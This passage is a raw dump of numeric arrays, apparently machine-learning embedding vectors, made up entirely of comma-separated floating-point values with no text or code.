0090711116,0.069455124,0.012584453,0.011246099,0.017590972,-0.010875125,0.03810795,0.041655533,0.035389084,-0.020841794,0.017379863,-0.04154741,-0.018481275,0.00007059937,0.066563435,-0.024892949,0.008948983,-0.018414302,0.046069704,0.0038175818,0.012608723,0.045406934,-0.021048864,-0.0008295657,0.025911922,0.0033048082,-0.0016453947,0.02688557,-0.019106794,-0.004572806,0.035528854,-0.028019052,-0.016093623,0.007890368,-0.010040992,-0.026359221,0.0068200827,0.020514337,0.00905928,-0.034019414,0.008922874,-0.051196333,-0.025957532,0.046597585,-0.0029832304,0.0073446156,0.016262636,-0.020965446,-0.06754993,0.08315331,0.0238125,0.019727936,0.0049609765,0.038786072,-0.017622644,0.029175285,0.0015783617,0.061965086,0.032909136,-0.033276644,-0.0061553554,0.017672604,0.01596661,-0.0010631843,0.013379053,-0.014548655,0.032993976,0.008490038,0.02053973,0.032250267,-0.09718952,-0.0080236485,0.012864945,0.015517454,-0.014809806,-0.031029621,-0.025432888,0.038772523,0.09694592,-0.0016931199,0.042673696,0.0272643,-0.03918988,-0.035393048,-0.02070218,0.0034507085,0.0764765,0.10390523,-0.077121355,-0.063036665,0.04754314,-0.026643638,0.039623156,-0.0021391036,0.017402122,0.16873199,-0.04876988,-0.013503245,-0.011936733,-0.03091383,0.039551698,0.020997088,0.016394094,-0.047288444,0.008914047,0.003934313,-0.00047443705,-0.023901252,-0.027773393,0.055329893,0.0971221,-0.07223512,0.0025886956,-0.020020822,0.0018046132,0.03784281,0.02814439,-0.020272639,-0.00076148467,0.011006928,0.0642056,-0.0040284656,-0.045725968,-0.03397701,-0.088618,-0.033796303,0.05079796,-0.008406539,-0.02782469,-0.019850703,0.012546047,0.018688207,0.023432856,-0.015567606,0.013547661,-0.0038254221,-0.040636405,-0.020343952,0.01635022,0.018570019,0.036451507,0.026304666,-0.0016337615,-0.027350143,0.017718805,0.025911318,-0.0086862175,0.10672375,-0.044113606,-0.08437226,-0.0393297,0.01695159,0.017054975,0.007040822,0.0354793,0.026116837,-0.041516412,0.06658831,-0.013453546,-0.08747125,-0.00016275307,0.0095326435,-0.047285825,-0.04454114,-0.005174354,-0.052278075,0.00047164108,0.01764631,-0.02085284,0.03385588,-0.016136596,0.022005782,-0.03252336,-0.03314144,0.0012157853,0.007181966,-0.04483044,-0.046887297,-0.002307224,0.0007310998,0.072642475,0.017915588,0.05420257,-0.0024071755,0.034083735,-0.008970377,-0.009703751,-0.009298963,0.05127119,-0.01867704,-0.03315822,0.042144172,-0.079420365,0.004972902,-0.07548469,-0.004325497,-0.03712064,0.011831739,-0.03612763,-0.02987312,-0.050536748,-0.03503148,0.0027880708,0.029298816,0.034384772,0.030374654,-0.023946006,0.019253096,0.03532645,-0.020587971,0.025223939,-0.031263977,-0.055968307,-0.054531407,-0.0031646194,0.0009802481,0.04066878,0.03604764,-0.0027773157,-0.067232125,-0.028206013,0.054386877,-0.055036817,0.008194456,0.042771526,-0.06750809,0.05169828,-0.026268901,-0.06740437,0.03367231,-0.0202525,-0.029967822,0.034466233,0.013816115,0.0075703575,0.019358465,0.033887643,-0.04786061,-0.012754355,-0.01170233,-0.042711,-0.001073489,0.007476726,0.02948093,-0.07590238,-0.0023393787,0.057217944,0.0028012143,0.024587603,-0.013919437,-0.061087444,0.020086922,0.0025974694,-0.0039222874,0.0019217764,0.025105203,-0.05808326,-0.023199707,-0.01930175,0.019064391,-0.00571586,-0.023768144,-0.055659745,0.051815383,-0.046796013,0.062953874,0.018922476,-0.04521674,-0.05506539,0.038324427,0.038837485,-0.05439173,-0.004875397,-0.055038575,-0.03664451,-0.06616839,0.058401573,-0.010716096,0.02240476,-0.030418381,0.04943001,0.03016893,0.00938731,0.012619101,0.058512505,0.017786613,-0.035243228,0.021388069,0.02366736,0.0763872,-0.024488498,0.040151257,0.07169453,0.035418622,0.017673485,-0.021870395,0.014224905,0.02226693,-0.047950752,-0.08517508,-0.036150202,-0.044034664,-0.02275513,-0.007043398,-0.029251654,0.037363756,-0.020994067,-0.009356937,0.04088104,-0.06113125,-0.042141333,0.00968321,0.03567767,-0.015613488,-0.043734,0.008288302,0.032316707,0.08639351,0.038018454,-0.0144952545,0.00003114155,0.032757167,0.0015021311,0.013796092,-0.068095125,-0.015349744,-0.032531865,0.0028457723,-0.014270637,-0.035651986,-0.024704704,-0.045439947,-0.012514257,-0.016808229,-0.015711179,-0.023320273,0.021730531,-0.0030698623,-0.06266001,-0.032032944,0.019078087,-0.023490492,-0.003640756,0.032596238,0.047428604,-0.01697473,0.010822191,-0.004477193,0.0012537893,-0.03178623,-0.0034317041,-0.04218341,0.013949261,-0.0025564781,0.010905425,-0.020631399,0.022536566,-0.006106899,-0.031532146,0.008644063,0.0437046,0.0754713,-0.02791015,-0.057515047,0.037824757,0.022426696,-0.00087087275,0.05251317,0.027072685,0.024208494,0.020072335,-0.0031100626,0.013745289,-0.015299413,0.06304631,-0.012905713,-0.012423158,-0.03385491,-0.056097265,-0.07069786,0.000672801,-0.03902833,-0.015127853,-0.016140202,0.041322656,-0.015102987,-0.006171094,-0.038040455,0.055790525,0.027519261,-0.03874485,0.003823763,0.0037088546,0.0055478476,-0.005154559,-0.03273221,0.019054817,0.014159655,0.049659055,0.12513971,0.007202508,0.017592294,-0.020469058,-0.0019494274,0.014179595,-0.019485708,-0.015502484,-0.017445458,-0.01940492],[0.056781784,0.012915245,-0.17291161,-0.04120246,0.1071933,-0.11662721,0.065343484,0.03091444,-0.013719687,-0.0841916,-0.015361332,0.037724372,0.06220695,-0.0324266,-0.051353537,-0.083135314,0.013659397,-0.036741063,-0.047603287,0.0175045,0.0041903723,0.013572914,0.023291118,-0.0071048737,0.07777236,0.04311478,0.013868765,-0.003466335,-0.029729437,0.038980223,0.026053019,0.024133587,-0.04834327,-0.012208203,-0.06381688,-0.061189245,0.04404523,0.039848648,0.004194046,0.03124512,0.025335202,0.03996926,-0.012334353,-0.05509097,0.0069468287,0.013729505,0.03393554,-0.01829765,0.07290296,-0.06674752,0.009061059,-0.022539794,0.003571629,-0.011541146,0.08534361,0.034505244,-0.006313971,0.027531473,-0.02556603,-0.0341852,0.090116195,0.013792405,-0.068062,0.012637974,0.0014295767,-0.049074396,-0.024024641,0.025838837,0.036245137,-0.027605686,0.035081077,-0.02113263,-0.02317987,0.023860974,0.009772356,-0.003897475,-0.036639523,-0.034088902,0.038443163,0.051817406,0.019006874,-0.009410401,0.06322151,0.018562168,0.006763678,-0.0060411287,-0.032104235,-0.013717185,-0.0037199082,0.02230318,0.014689895,-0.0012477284,0.07211454,0.018649265,-0.07107763,0.016162222,0.0213389,0.0057902704,-0.061071027,0.0039691958,-0.015544741,0.007138956,0.035687618,0.014694412,0.0021118748,0.0144636845,-0.0058355,0.022955952,-0.006641651,-0.01898847,0.018860625,0.07585457,0.0120300185,-0.006423796,0.020299312,0.0058659087,0.057028566,-0.036658634,-0.03308122,0.045001935,0.0070835045,-0.017664563,0.012037605,0.0274939,0.023925453,0.04810668,-0.032867156,0.0374362,-0.0102699725,-0.07510188,-0.0018307957,-0.018510947,-0.018334344,-0.0060067936,0.044257674,0.042933285,-0.048132367,-0.033032298,-0.017946443,-0.022737132,0.021555614,0.034254067,-0.0011401187,-0.026565466,-0.025047153,-0.018302014,0.011864029,-0.057658672,-0.050992306,0.041864123,-0.015179323,0.008744395,-0.02918323,0.011282269,0.058334008,-0.020063663,-0.025927207,0.011108061,-0.007328984,0.06544896,0.012095768,0.032618392,0.0016670921,0.0568004,-0.032007754,-0.051687993,-0.008144815,0.07377672,-0.028115112,-0.0028084624,-0.04813595,-0.048131384,-0.022261038,-0.020485623,0.0024536164,0.014553676,0.045722205,-0.031714916,0.04592619,-0.041197084,0.0050204527,-0.050869428,0.062195808,-0.027885452,-0.0206072,-0.043876644,0.01904494,-0.04669672,-0.013862252,0.00015236653,0.04719297,-0.015114569,-0.054718286,-0.003091494,-0.06099121,-0.043810565,-0.008540387,-0.0060333316,0.014514709,-0.020039164,-0.032516398,-0.028583886,-0.047225423,-0.013228993,-0.013822962,0.0006748278,-0.009723899,0.02201525,-0.015274959,0.034704927,0.072050154,-0.0019208221,0.025646633,0.025559511,-0.010273112,-0.023583163,-0.0048545008,0.008749891,-0.062550746,-0.0011191939,0.019009352,0.0017747424,-0.00007130949,-0.011406609,0.032154948,0.026091188,-0.022312257,0.0009775448,0.0054194555,-0.0024267202,-0.032581605,-0.08857796,0.06034748,0.0070614163,0.0051796907,0.029021634,-0.016026108,0.06720286,0.007923602,0.062892094,-0.011536478,0.050049454,-0.059383746,-0.030655833,-0.021369064,-0.013841452,-0.042741414,-0.017383477,-0.00816246,0.012654777,0.0039274595,0.0033523722,0.022272104,0.012258383,0.06556098,-0.06428644,-0.019048238,0.01708291,0.053870603,0.015457754,0.03741657,0.032364644,-0.027020505,-0.020990867,0.0003298838,-0.07216621,-0.03932056,0.01112599,0.022488153,0.03523662,-0.008204344,0.022816803,0.020966703,0.0290198,0.015339025,0.044049226,0.018073324,-0.01899308,-0.024069086,-0.00540104,-0.017934775,-0.015517207,0.004139555,0.03170682,-0.014250201,0.0076658665,0.025149196,-0.01673131,0.021379514,-0.004169248,0.023312692,-0.021793569,-0.053301256,0.027547792,-0.017982936,0.012178448,0.0572425,-0.02257425,0.028018354,-0.01890433,0.054943513,0.040494513,0.039062332,0.051190805,0.011839618,-0.028328292,-0.010954348,0.012128326,-0.006220849,-0.05286357,-0.03539889,-0.018474972,-0.02652416,0.03902894,0.0029475538,0.009110441,0.021937497,0.01962649,0.011235213,0.0075651943,0.036040675,-0.026040448,0.0045991438,-0.014946695,-0.028656892,0.025851084,-0.027625747,0.0308754,-0.05137009,-0.036666453,0.027250616,0.049225546,0.04834052,-0.05609004,-0.0044732583,0.060827956,0.017027322,-0.003302754,-0.034946352,0.0063371104,0.031970132,0.031146577,0.034210023,-0.03834336,-0.0039550173,-0.010905555,-0.04759869,0.0060472093,0.033899695,0.029122416,-0.04383565,0.006061286,-0.014930754,-0.04492501,0.022668205,0.014666666,0.040925458,0.0037121105,0.0028286113,-0.004483873,0.040745534,0.037109483,-0.024474535,0.016435469,-0.010796264,0.053329475,0.061118446,-0.002513016,0.008716,0.009044401,0.008279897,0.005504278,0.048153527,0.006404155,-0.046501692,0.0461864,-0.07821452,0.041437536,-0.010412399,0.018830422,0.001599537,-0.06423095,0.016272428,0.03322088,0.03741245,-0.03925629,0.028826974,-0.004215141,0.016640017,0.044376932,-0.030180316,0.017136011,-0.05937073,0.00048564264,-0.004881876,-0.044216193,0.0097381,-0.004971959,0.0084474,0.051661786,-0.043831136,-0.08085724,0.034102347,0.03672851,-0.043818828,0.017041184,-0.03233394,-0.023287002,0.0715579,0.014892998,0.0038070257,0.0046863058,-0.010456784,-0.028456394,0.005635726,0.042168193,0.046361085,0.027211031,-0.016496893,-0.03717521,0.06479052,-0.005599711,-0.012585349,0.0033944119,-0.03975566,0.01958827,0.0392994,0.03111591,-0.003306164,-0.0586144,0.0037841662,0.0067782053,0.058713634,-0.013970547,-0.0014525212,-0.030565426,0.027572501,0.025786893,0.033566736,0.04086488,-0.0036603143,-0.021313842,-0.0614414,-0.0051560826,-0.030682623,0.056607038,0.103615664,-0.06233355,-0.044103265,0.034886666,-0.00260979,0.01515899,-0.021269865,0.012436318,0.11096876,-0.01152624,0.016541366,-0.008105954,0.023415511,0.04179135,0.01752186,0.04036467,-0.054883033,0.009891198,0.009633818,-0.0116914585,-0.010058775,-0.03721433,0.05385435,0.07887959,-0.06743636,-0.028576959,0.035709675,-0.043526597,0.05192151,0.0125508,-0.034290124,0.03899464,-0.041711908,0.04806367,-0.004669165,-0.061350886,-0.021595133,-0.06329182,-0.029082492,0.022499653,0.025731683,-0.04323407,-0.026970359,0.014626863,0.01426442,0.055935938,-0.0110471025,0.01178983,0.0069071115,-0.050950058,-0.010107703,0.01302242,-0.004157594,-0.01885574,0.039707918,0.030897886,-0.025702769,0.018621014,0.012828805,0.0030744476,0.04456525,-0.0384317,-0.046791334,-0.047910437,0.002667152,-0.006582115,-0.015871527,0.02223361,0.00706364,-0.027834611,0.047450047,0.024563681,-0.056351285,0.010657129,0.008206143,-0.019870024,-0.028065871,0.017222103,-0.029709835,-0.039084885,-0.01790796,-0.042502813,0.0508362,0.004878371,0.014438457,-0.004836616,-0.06524239,-0.0030139855,0.034805875,-0.017587442,-0.04799033,0.019724911,0.009782795,0.012845285,-0.0026782262,-0.0038427403,0.0030104425,-0.024512194,-0.0007780024,-0.030833576,0.05833156,0.037237365,-0.010981492,-0.050628033,0.06099475,-0.07210178,-0.001717518,-0.041878935,0.042011447,-0.022237714,0.019270562,0.004594867,-0.06807804,-0.01848445,-0.02823326,0.017400825,0.031638086,0.03199639,-0.0039392826,-0.09700558,-0.0017927581,0.04146006,-0.030418769,0.04640734,0.0071615404,-0.07937285,-0.018889291,-0.0027292685,-0.0018629573,0.023129944,0.052581836,0.02944371,-0.04880029,-0.051984526,0.04580638,-0.011995924,-0.0016498319,0.06195729,-0.031799518,-0.00965909,-0.023015833,-0.031880487,0.032183144,-0.049065307,-0.0372228,0.030290443,-0.00027641407,0.003117807,0.019487066,0.0014278084,-0.007943535,-0.0035291044,0.0049312026,-0.07303055,0.012032864,0.011516588,0.017275969,-0.056002125,0.009269211,0.038944725,-0.024771955,-0.0031410663,-0.01488199,-0.020522667,0.017336246,-0.010647057,-0.00867942,0.0006837132,0.003649831,-0.101642005,0.041638315,0.015560231,-0.0093515515,-0.005531605,-0.026444927,-0.04438573,0.052626852,-0.056563757,0.050036922,-0.006433571,-0.040388383,-0.037706304,0.0043949992,0.015143003,-0.0386611,0.0761651,0.011851759,-0.04206241,-0.11001645,0.04026179,-0.021980723,0.03692683,0.016809577,0.040377855,0.038283207,0.038099986,-0.03357807,-0.0043525193,-0.0096494425,0.017748516,0.032951355,0.04186673,0.06997289,-0.006404677,0.042491946,0.060430683,0.02736537,-0.0089766495,0.007837341,-0.010084379,0.027243705,-0.03232872,-0.067216165,-0.07545463,0.0031242121,-0.023799928,-0.03528444,-0.0375673,0.030855644,-0.008000502,-0.018133704,-0.024568016,-0.03246207,-0.04259026,0.029534206,0.004773512,0.02614126,-0.04965643,0.026149288,0.022236297,0.05740419,0.0033048831,-0.006129761,0.017392255,0.0058865813,-0.038234606,0.05460703,-0.07057794,0.007954449,-0.0478518,0.0142529,-0.042526457,-0.05823592,-0.01425512,-0.04348465,-0.0074336817,-0.01631352,-0.048131876,-0.004697147,0.043116316,-0.020960152,-0.005633058,-0.06627287,0.08592968,-0.0038180791,0.021151004,0.012198917,0.027870214,0.010316915,-0.03735628,0.038035583,-0.026393186,-0.003505416,-0.0125077395,-0.054896683,0.039106563,-0.018575273,0.051866293,0.013856062,0.027532302,0.007825758,-0.029617557,0.014050279,0.04035076,0.008021798,-0.0020836124,-0.05541037,-0.0035305782,0.0070593576,0.0083457,0.058556713,0.012590994,0.0324813,-0.03978231,0.013527081,-0.0061932965,-0.054096133,0.044142153,0.013496686,-0.019510686,-0.05604018,-0.015982956,-0.07863756,-0.0073552225,-0.03547375,0.04215737,-0.053311065,0.03440766,0.032639258,-0.01117671,-0.013089813,0.02800833,-0.0010232085,-0.030115929,0.07564131,0.020384144,-0.02376528,0.046062633,-0.01444723,0.007929178,0.021124212,0.016370699,0.094227105,0.0049532265,0.058886826,-0.01111291,-0.0391587,0.0418104,-0.012973386,-0.067130685,0.019508429,-0.005655859],[0.034349192,0.018162586,-0.13940504,-0.008904585,0.048420835,-0.08725092,0.023786455,0.0097151315,-0.023836339,-0.045707274,0.048909534,0.011369843,0.051136523,0.009026259,0.00024005011,-0.067993835,0.027749712,-0.026532851,-0.02906088,0.012728697,0.034846816,-0.09703356,-0.0041425065,-0.018166518,0.10576883,0.05679533,-0.028585518,0.009642372,-0.0329592,0.04105183,0.048020985,0.008348719,-0.028995443,-0.026544664,-0.03206793,-0.075387985,0.04480449,0.011779014,-0.0025189896,0.04675577,-0.004141045,-0.031937182,0.04445318,-0.069015466,-0.0036950384,-0.01754063,0.020449303,0.0023096553,0.06223458,-0.052415192,-0.008204505,-0.026336743,0.014941387,0.019016305,0.09371851,0.051220182,0.060523897,0.044965334,0.019599905,-0.06618885,0.088128924,0.082129166,-0.0066175205,0.06706381,0.04747195,-0.050893836,0.04924505,0.026118053,-0.012708412,-0.014481407,0.041373186,-0.038209945,0.032060187,0.0014993078,-0.014660924,-0.027296249,-0.04010437,-0.050136782,-0.016736472,0.041190635,0.03330278,0.010325156,0.047229763,0.017625088,0.055200927,-0.011014658,-0.028764928,0.0017802863,-0.010922866,0.03412766,0.007974687,0.019805739,-0.009151887,0.0003567684,-0.07551264,0.00596198,0.009998449,0.016795946,0.005354585,-0.021109775,-0.019064303,-0.020601714,-0.028283685,0.009935785,0.015529772,0.052688275,-0.010892899,0.033707626,0.008755387,0.043924093,-0.0034943544,0.022043532,-0.018180165,0.01798339,0.009392546,-0.026300462,0.041304834,-0.03770365,-0.016124131,0.036033873,0.027621664,-0.0024100747,-0.019975292,-0.00024409423,0.024068737,0.04351227,-0.059038825,-0.041597463,0.0035419017,-0.03275118,-0.0072650257,-0.008747185,-0.029690571,-0.009051797,0.029609723,0.06530561,-0.050411284,-0.045794774,0.019887058,-0.0005993352,-0.003591159,0.021687381,-0.009632085,-0.02708909,0.00073259784,0.0036613664,-0.011250501,-0.010310504,-0.07721126,0.01817168,-0.02503485,0.018592082,-0.034872845,0.04497081,0.041935578,-0.040959984,-0.050067253,0.011480301,0.0028867403,0.049135484,0.029012877,0.021434143,-0.03908312,0.059260257,-0.023281323,-0.117943995,0.010916441,0.06832232,0.012595548,-0.021823335,-0.06253932,-0.04858673,-0.024406634,-0.020704096,0.019066392,0.024437228,0.05129103,-0.0073184012,0.0752662,0.00081334694,0.032556113,-0.02499864,0.04217618,-0.008485715,-0.055146366,-0.025854878,-0.017104138,-0.055406768,-0.02256825,-0.016577395,0.030492675,-0.003315503,-0.08563157,0.03468961,-0.027799558,-0.051265907,0.0011535154,-0.014370915,0.032971997,-0.0144062685,-0.0060885996,0.028946247,-0.056503832,-0.0019773701,0.007015191,0.009288241,-0.028752675,-0.008080596,-0.048460476,0.035887446,0.05897302,0.009314188,0.030538624,0.004448582,-0.013499705,-0.031017244,0.00787016,-0.024787104,-0.0076798,0.042395104,0.0061915214,0.02234979,0.03921154,0.03188683,-0.0009257839,0.020261932,-0.06874593,0.03478085,0.042918175,-0.009587679,-0.034885526,-0.06674892,0.046736233,0.014445703,-0.009045923,-0.007129987,-0.004008171,0.039256506,0.020495117,0.0508901,0.04682743,0.05263001,-0.047145464,0.00044104643,-0.019222757,0.014742296,0.018710565,-0.010566988,-0.019185133,0.020381425,0.016023494,0.041094724,0.016953865,0.0014330811,0.07208121,-0.072276875,-0.011984878,0.014631596,0.021803696,-0.042676706,-0.004549709,0.018367615,-0.0053823967,-0.025135694,0.036826253,-0.03788148,-0.045829438,0.0411969,-0.01152894,0.006646218,0.024197556,0.005491663,0.010033067,0.04071958,0.0028177134,-0.013814104,0.053440172,-0.023268435,-0.019779785,0.0024462845,-0.04976204,-0.052857365,0.020593757,0.0022620948,0.00878799,0.03477165,0.037903238,-0.035193373,0.0005520667,-0.023729604,0.07108748,0.013203523,-0.032481052,-0.0009680466,-0.07692406,0.032539893,0.0428027,-0.04308146,0.007946856,-0.030672772,0.049419645,0.025432453,0.041910294,0.09227456,0.0025685194,-0.035935555,0.019797344,-0.012750872,0.0025099088,-0.033096157,-0.020787684,-0.038588237,-0.02073877,0.040315494,-0.033718977,0.09982537,0.03684311,0.011675776,0.039162807,-0.017263178,-0.0058332356,-0.049338855,0.017639622,-0.021354578,-0.03856136,-0.010818147,-0.020284457,0.03396852,-0.029131453,-0.032551162,0.026612777,-0.00028165945,0.036937386,-0.0378542,0.007706054,-0.008126397,0.020263236,-0.013322854,0.012214607,0.04510159,0.01779615,0.026070653,-0.006015203,-0.02164859,-0.03345707,-0.024356384,-0.028033128,0.012417447,0.056793373,0.0077081076,-0.015699951,0.0035434167,-0.025007509,-0.028027877,-0.008542856,-0.008964223,0.02652958,0.026008636,-0.011437251,0.002703238,0.026004057,0.0068323994,0.0014487619,-0.00739216,-0.0024387517,0.08658964,0.04545765,0.04250169,-0.008950025,-0.01273039,-0.010663085,-0.012770247,0.0094158165,0.039078515,-0.00301563,0.028248608,-0.04936244,-0.014179979,-0.009264705,0.046867296,0.03477945,-0.055654746,-0.0030245236,0.03423379,0.023195636,-0.045752235,-0.003121111,-0.015969587,-0.03510857,0.04542589,0.030801414,-0.062172774,-0.06774766,-0.0023198547,0.027076207,-0.022885934,0.009952976,0.0031872052,0.012626663,0.03968557,-0.06791802,-0.040823583,0.011704624,0.020754352,-0.017694393,0.005009624,-0.022642408,-0.016517488,0.01638187,0.03497704,0.053866807,0.021883322,0.038704854,-0.071617745,-0.0008968992,0.03344492,0.058111243,0.022109075,-0.0020703685,-0.018885683,0.01628373,-0.015280703,0.028226012,-0.008377712,-0.025549753,0.059313525,0.033950657,0.08535342,-0.011979858,-0.07509207,-0.021488804,0.011728853,0.06627589,-0.01987675,-0.009066581,0.012476008,0.056477927,0.036278278,-0.011193916,0.012366965,0.03465896,-0.0014741578,-0.03232724,-0.043626558,-0.033234034,0.0688263,0.07907851,-0.046006687,-0.10725982,0.021008566,-0.008411352,0.006624986,-0.033458848,0.021168256,0.09536557,-0.018907687,0.016306862,0.0066101765,-0.0015314722,0.028121933,0.04704331,-0.0042615775,-0.03215944,0.012821261,0.008612197,0.029068816,-0.047794852,0.007651683,0.038503252,0.05969044,-0.06642168,-0.027578112,0.04493503,-0.008079599,0.008087674,-0.0017570731,-0.050362993,0.07056937,0.028999992,0.08317358,0.018672017,-0.04449317,-0.033916015,-0.049382843,-0.045355458,0.001775564,0.011580028,-0.016910054,-0.044761986,-0.007906579,0.024342446,0.038872223,0.012431129,-0.02689052,-0.016772944,-0.051361978,0.014856412,-0.014976016,0.033683926,-0.0069746003,0.058256723,0.030505873,-0.03769773,0.021168778,0.019992884,-0.0102707045,0.031173326,-0.06342323,0.008306602,0.02857121,0.026365003,0.023194533,0.0072817453,0.047437984,0.040356386,-0.037338186,0.023222718,0.003018639,-0.056018606,-0.0016875351,0.043581806,0.003346771,0.007028341,-0.0062536537,-0.07251123,0.009401209,0.022718256,0.010325518,0.054543234,-0.0123119475,0.01992518,0.025052741,-0.06244858,0.02334054,0.0014216802,-0.047160663,-0.05799093,0.00799844,0.048478536,0.024641097,0.0002929524,-0.0053812293,-0.0012817453,-0.0036797163,-0.0097898,-0.011824967,0.0011625484,0.08731513,0.005515135,-0.056371428,0.0475848,-0.06383565,0.009048899,-0.031138156,-0.002120636,-0.0060734707,0.050145164,-0.012875182,-0.018056653,-0.0110770725,-0.02188716,-0.025327455,0.05167677,0.008132128,0.019702006,-0.06416617,-0.009460899,0.034821182,-0.019873695,0.072794765,0.008474628,-0.026004646,-0.036780905,0.009245915,0.02922819,0.019384619,0.04447499,0.012131097,-0.07396022,-0.04018848,0.025164017,-0.002790519,0.023665473,0.04680875,-0.034728095,-0.0041949167,-0.044127405,-0.03181606,0.045845456,-0.029165678,-0.013824399,0.0011842534,-0.006981909,0.025382176,0.0166512,0.03592466,-0.030443192,-0.0064975633,0.003189559,-0.08440741,-0.061727915,-0.004158536,0.023160344,-0.077207,-0.02129038,0.042461537,-0.017580386,0.022941543,-0.045256652,-0.050942823,0.018700654,0.009319415,0.016324833,0.026713008,0.031430643,-0.024600968,0.042561784,-0.012450284,-0.01340018,-0.04126261,0.006620502,-0.034647234,0.01410744,-0.072331086,0.030574685,-0.00053681846,-0.043565992,-0.05157077,-0.0015144002,0.03432496,-0.016630024,0.04313255,-0.049886316,-0.06021119,-0.076914124,0.03298466,-0.020116072,0.00022244557,-0.0012824397,0.031700693,0.065017484,-0.012692786,-0.052338295,-0.019930637,0.035749536,-0.05154056,0.015435982,0.018235954,0.05464051,-0.017399633,0.046919618,0.05105797,0.032311324,-0.0464705,0.041449662,0.0038462277,0.016915929,-0.04833639,-0.040002234,-0.07652494,-0.00959321,-0.009338068,-0.0059332955,0.017175788,0.025919992,0.007237884,-0.034709454,-0.016057821,-0.048446633,-0.03267532,-0.014181524,0.030029332,-0.020870045,-0.007915412,0.012209627,0.006632655,0.03942668,0.016207714,-0.02383075,-0.013328802,0.0003834897,-0.024186436,0.046049997,-0.01400228,-0.028975526,-0.045680135,0.0043654568,-0.020144809,-0.08060893,-0.045771733,-0.037123706,-0.04752426,-0.021479353,-0.061716583,0.020833293,0.0043641613,-0.014625184,-0.026945025,-0.04338037,0.06113244,0.005241001,0.015461048,-0.0037106853,0.063567236,-0.0032802175,-0.027544202,0.008393162,0.009601333,0.008408875,0.017739875,-0.056098543,0.020627625,-0.0075133257,0.038720608,-0.017036099,0.024465986,0.025315067,-0.031830914,-0.0026000908,0.03538866,0.02472729,-0.0024215013,-0.07223132,-0.012811913,0.0063048946,-0.0008680293,0.028388664,-0.028933667,0.0067681735,0.00048373215,-0.035725098,-0.03451375,-0.06973204,0.04057113,-0.03998262,-0.0021907988,-0.03545343,-0.03318408,-0.10006798,-0.018039286,0.003931042,-0.024075856,-0.024815831,0.032692924,0.053428233,-0.006167133,-0.01261254,0.03711158,0.013115247,0.0065023745,0.040910196,0.047263917,-0.034896377,0.031096991,-0.04940837,-0.018761681,0.019770436,0.015146888,0.07634893,0.030342683,0.032463793,-0.04387296,0.01551665,0.03657824,-0.017577792,-0.073139355,-0.033085015,-0.010863502],[0.044964626,0.060607098,-0.15742998,-0.058098312,0.078760095,-0.08568999,0.017873706,0.051179253,-0.018643232,-0.060087446,0.0095412815,0.0658175,0.08188273,0.042481426,-0.05487263,-0.014116366,0.032458466,0.015535234,0.011646182,0.018639088,-0.020095041,-0.051270846,-0.020799415,-0.020128518,0.115447626,-0.018198414,0.0028991892,0.019510087,-0.025536403,0.018144667,0.022841094,-0.0044452795,0.024414228,-0.032653417,-0.012632213,-0.0654988,0.028621536,0.0025180643,-0.0061717625,0.059446245,0.010307033,0.053308394,0.0050142882,0.012892431,0.0043458017,0.023687534,0.02901786,-0.019551767,0.022200689,-0.08745256,0.020167008,-0.02930946,0.023027856,-0.02653489,0.07985039,0.057640467,0.041434523,-0.00009423332,0.019965768,-0.050202455,0.053580273,0.0657222,-0.07424578,0.057189535,0.022546457,-0.03595862,-0.03249291,0.030787,0.013861662,-0.014489521,0.07690503,-0.039336197,-0.019481901,0.008423277,-0.015516259,-0.013791328,-0.04388999,-0.015269002,0.019287115,0.0691719,-0.016307086,-0.010889383,0.04516167,0.058139753,0.009998836,-0.049823035,-0.031182876,-0.03063932,-0.01356212,0.053505287,0.010485378,-0.014569808,0.04105857,0.019977402,-0.021299863,0.0010684974,0.015442494,0.030929202,-0.058228802,-0.061328672,-0.018036598,-0.007356632,0.045834027,0.0110658165,-0.02176223,0.07243586,0.040660802,-0.018324688,-0.009518084,-0.033216134,0.033556037,0.07125501,0.010692395,-0.06831778,0.010166319,0.0042733345,0.058805592,-0.0007765487,0.0008316613,0.049125794,-0.042084377,-0.021038929,-0.027380189,0.06173107,0.025872437,-0.027436186,-0.041162524,0.027557129,-0.03443494,-0.052500784,0.025018154,0.00011987697,-0.0031034162,0.0030756213,-0.0052599525,0.042180527,0.005012391,-0.011811508,0.004311582,-0.031622827,0.00049435935,0.009593208,0.007355455,-0.031910636,-0.03433688,-0.022139253,-0.009528593,-0.014734985,-0.043144472,-0.00017950202,-0.024185088,0.04560261,-0.017267762,0.010440949,0.012882018,-0.029317042,0.012602096,0.022283318,-0.01310387,0.025222115,0.03420082,0.0075589637,-0.016256964,0.058965538,-0.042750213,-0.03600501,-0.004738985,0.09005977,-0.01812257,0.0455071,-0.035385147,-0.008132643,-0.021090167,-0.026724167,0.0015803188,0.031097956,0.0044786986,-0.03910885,0.023984894,-0.022874527,0.015143937,-0.06108104,0.08119351,-0.0059783016,-0.022420563,-0.03332797,0.025461156,-0.054765522,0.0030789203,-0.02126833,0.020579716,-0.02092551,-0.06561203,-0.033590935,-0.0007061402,-0.015397791,-0.011007749,-0.0077866735,0.010337927,0.0029563904,-0.019933693,0.012507952,-0.04369828,-0.02994798,-0.04781639,0.020590983,0.008963948,0.0074632238,-0.013651748,0.06866893,0.036817975,-0.009562307,0.028473204,0.030254133,-0.024740538,0.0011403079,0.008621799,0.021320807,-0.06879222,0.0038487886,0.07570286,0.014098385,0.026735896,0.003037043,0.02003603,0.01909484,-0.04737343,0.010498097,-0.041141644,-0.052551094,-0.005346757,-0.077643365,0.026697762,-0.00033167214,-0.014038827,0.0053570964,0.0127668185,0.09144333,0.011312146,-0.00080850435,0.024475288,0.036238518,-0.04709706,0.0134259695,0.0028722142,0.004193371,-0.008066514,-0.041731514,-0.028752271,0.06792452,-0.0010801271,0.021645661,-0.0031954017,0.04583187,0.0660212,-0.0674854,-0.03139075,0.0005290591,0.038726073,-0.013940393,0.030224467,-0.004424433,-0.024768192,-0.045465987,-0.012595204,-0.06692396,-0.03762283,0.024499776,0.0058787744,0.0031108756,-0.009586022,0.032772075,0.03613984,-0.00020214,0.017051661,-0.004804277,0.030011248,0.0007186775,-0.015604799,0.02268425,-0.015873687,-0.02704769,-0.010343826,0.010444435,-0.023388663,0.014860483,-0.017566523,-0.010295192,-0.012551874,0.028078489,0.035813227,-0.024873367,-0.015736483,0.0318226,-0.01150116,0.025187328,0.052372888,0.055552613,0.022920933,-0.004275639,0.04519997,0.063966736,0.015376001,0.02442939,0.0049982313,-0.01906976,0.0054235854,0.01330789,-0.007033768,-0.0072414624,-0.039931368,-0.014267053,-0.0038027726,0.02909947,0.0038985107,0.03284685,0.04187637,0.048497103,0.010609877,-0.017384497,0.0043476475,-0.027913837,0.041470